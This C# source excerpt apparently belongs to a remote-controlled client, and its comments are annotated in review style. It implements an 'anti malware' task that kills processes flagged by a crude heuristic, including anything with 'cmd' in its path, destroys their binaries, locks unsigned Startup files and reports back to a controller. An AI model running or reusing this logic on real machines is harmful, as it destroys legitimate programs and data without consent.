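        /// <summary>
        /// Heuristically decides whether the executable at <paramref name="fileloc"/> should be treated
        /// as malicious. This is a crude path / signature / attribute heuristic, not a malware scan:
        /// it yields false positives (any unsigned program under the user profile or ProgramData, or
        /// any path merely containing the fragment "cmd" or "wscript") and false negatives (a file
        /// with ANY valid embedded Authenticode signature is trusted, regardless of who signed it).
        /// Callers that act destructively on the result should keep that in mind.
        /// </summary>
        /// <param name="fileloc">Full path of the file to classify.</param>
        /// <returns><c>true</c> if the heuristic flags the file, <c>false</c> otherwise.</returns>
        /// <exception cref="ArgumentNullException"><paramref name="fileloc"/> is null.</exception>
        /// <exception cref="IOException">
        /// Propagated from <see cref="File.GetAttributes"/> when the unsigned file no longer exists
        /// (e.g. FileNotFoundException / DirectoryNotFoundException).
        /// </exception>
        public bool IsFileMalicious(string fileloc)
        {
            if (fileloc == null)
            {
                throw new ArgumentNullException("fileloc");
            }

            // Never flag our own binary (or any path that contains it).
            if (PathContains(fileloc, Application.ExecutablePath))
            {
                return false;
            }

            // Shell / script hosts are flagged purely by a name fragment. Windows paths are
            // case-insensitive, so the match must be too ("CMD.EXE" should match like "cmd").
            if (PathContains(fileloc, "cmd") || PathContains(fileloc, "wscript"))
            {
                return true;
            }

            // Anything under the .NET runtime directory is flagged. This is tested before the
            // signature check, so a signed runtime binary is still flagged.
            if (PathContains(fileloc, System.Runtime.InteropServices.RuntimeEnvironment.GetRuntimeDirectory()))
            {
                return true;
            }

            // A valid embedded signature short-circuits to "not malicious". Signature validity says
            // nothing about the signer's intent: signed but hostile binaries pass this test.
            if (WinTrust.VerifyEmbeddedSignature(fileloc) == true)
            {
                return false;
            }

            // Unsigned and living in a user-writable location -> flagged. Both lookups may come
            // back null/empty (variable unset, folder unresolvable); PathContains treats that as
            // "no match" instead of throwing or matching every path.
            string userProfile   = Environment.GetEnvironmentVariable("USERPROFILE");
            string commonAppData = Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData);
            if (PathContains(fileloc, userProfile) || PathContains(fileloc, commonAppData))
            {
                return true;
            }

            // Unsigned and carrying the System or Hidden attribute -> flagged.
            FileAttributes attributes = File.GetAttributes(fileloc);
            return (attributes & (FileAttributes.System | FileAttributes.Hidden)) != 0;
        }

        /// <summary>
        /// Case-insensitive substring test shared by the path heuristics in
        /// <see cref="IsFileMalicious"/>. A null or empty <paramref name="fragment"/> never matches:
        /// <c>string.Contains(null)</c> throws and <c>string.Contains("")</c> is true for every
        /// input, neither of which is what a path check wants.
        /// </summary>
        /// <param name="path">Path being classified (must not be null).</param>
        /// <param name="fragment">Path fragment to look for; null/empty means no match.</param>
        /// <returns><c>true</c> if <paramref name="fragment"/> occurs in <paramref name="path"/>, ignoring case.</returns>
        private static bool PathContains(string path, string fragment)
        {
            if (string.IsNullOrEmpty(fragment))
            {
                return false;
            }
            return path.IndexOf(fragment, StringComparison.OrdinalIgnoreCase) >= 0;
        }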
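        /// <summary>
        /// Runs one pass of the "anti malware" task: every running process whose main module is
        /// flagged by <see cref="IsFileMalicious"/> and that has no visible window is killed and its
        /// binary handed to <c>DestroyFile</c>; every file in the user's Startup folder without a
        /// valid embedded signature gets an empty, non-inheriting ACL. A summary line with a
        /// priority derived from the kill count is then sent through <c>mwork.Send</c>.
        /// </summary>
        /// <remarks>
        /// This is destructive and rests entirely on the heuristic in <see cref="IsFileMalicious"/>:
        /// a false positive there means a legitimate unsigned program is killed and its file
        /// destroyed. Every failure is swallowed, so a partial run looks like a complete one apart
        /// from the kill count. <c>fileskilled</c> is only read here; presumably <c>DestroyFile</c>
        /// maintains it — confirm.
        /// </remarks>
        public void Start()
        {
            mwork.addinfo("[Anti Malware] Execution Parameters:" + excparams);
            mwork.addinfo("[Anti Malware] Successfully started Malware Cleaner...");
            try
            {
                KillFlaggedProcesses();
                LockUnsignedStartupItems();
            }
            catch
            {
                // Best effort: a failure enumerating or re-ACLing the Startup folder ends the pass silently.
            }

            string priority = PriorityForKillCount();
            mwork.Send("ADDLOG|" + mwork.ClientID + "|" + priority + "|" + "Successfully finished Anti Malware Task. Processes killed: " + killed.ToString() + ".");
            mwork.addinfo("[Anti Malware] Processes killed: " + killed.ToString());
            mwork.addinfo("[Anti Malware] Files destroyed: " + fileskilled.ToString());
            mwork.addinfo("[Anti Malware] Successfully finished the Malware Cleaning!");
        }

        /// <summary>
        /// Kills each running process whose main module <see cref="IsFileMalicious"/> flags and whose
        /// window is not visible, then destroys that module's file and increments <c>killed</c>.
        /// Processes whose main module cannot be read (access denied, bitness mismatch, already
        /// exited) are skipped; a Kill failure does not stop the file from being destroyed.
        /// </summary>
        private void KillFlaggedProcesses()
        {
            Process[] processes;
            try
            {
                processes = Process.GetProcesses();
            }
            catch
            {
                return; // cannot enumerate processes: nothing to do this pass
            }

            foreach (Process p in processes)
            {
                try
                {
                    string path = System.IO.Path.GetFullPath(p.MainModule.FileName);
                    if (!IsFileMalicious(path) || WindowIsVisible(p.MainWindowTitle))
                    {
                        continue;
                    }
                    try
                    {
                        p.Kill();
                        mwork.addlog("[Anti Malware] Killed Process: " + p.ProcessName);
                    }
                    catch
                    {
                        // Kill can fail (access denied, process already gone); the binary is still destroyed below.
                    }
                    DestroyFile(path);
                    killed = killed + 1;
                }
                catch
                {
                    // MainModule / GetFullPath / IsFileMalicious / DestroyFile failures skip this process.
                }
                finally
                {
                    p.Dispose();
                }
            }
        }

        /// <summary>
        /// For each file in the current user's Startup folder that lacks a valid embedded signature,
        /// replaces its security descriptor with a protected, rule-less DACL. The file is NOT deleted
        /// despite the "Removed" log text; presumably the empty DACL denies all access instead — confirm.
        /// </summary>
        private void LockUnsignedStartupItems()
        {
            string[] startupItems = Directory.GetFiles(Environment.GetFolderPath(Environment.SpecialFolder.Startup));
            foreach (string item in startupItems)
            {
                if (WinTrust.VerifyEmbeddedSignature(item) == false)
                {
                    // NOTE(review): DirectoryInfo/DirectorySecurity are applied to a file path here;
                    // this appears to rely on the native security call not distinguishing files from
                    // directories — confirm, or use FileInfo/FileSecurity.
                    DirectoryInfo     info = new DirectoryInfo(item);
                    DirectorySecurity acl  = new DirectorySecurity();
                    acl.SetAccessRuleProtection(true, false);
                    info.SetAccessControl(acl);
                    mwork.addlog("[Anti Malware] Removed Startup Item: " + item);
                }
            }
        }

        /// <summary>
        /// Maps the <c>killed</c> count to the priority tag sent upstream: 0 = Info, 1 = Log,
        /// 2..5 = Priority, more than 5 = Risk. The original ladder tested "&gt; 2" before "&gt; 5",
        /// so "Risk" was unreachable, and a count of exactly 2 produced an empty priority.
        /// </summary>
        /// <returns>The priority string for the current kill count.</returns>
        private string PriorityForKillCount()
        {
            if (killed == 0)
            {
                return "Info";
            }
            if (killed == 1)
            {
                return "Log";
            }
            if (killed > 5)
            {
                return "Risk";
            }
            return "Priority";
        }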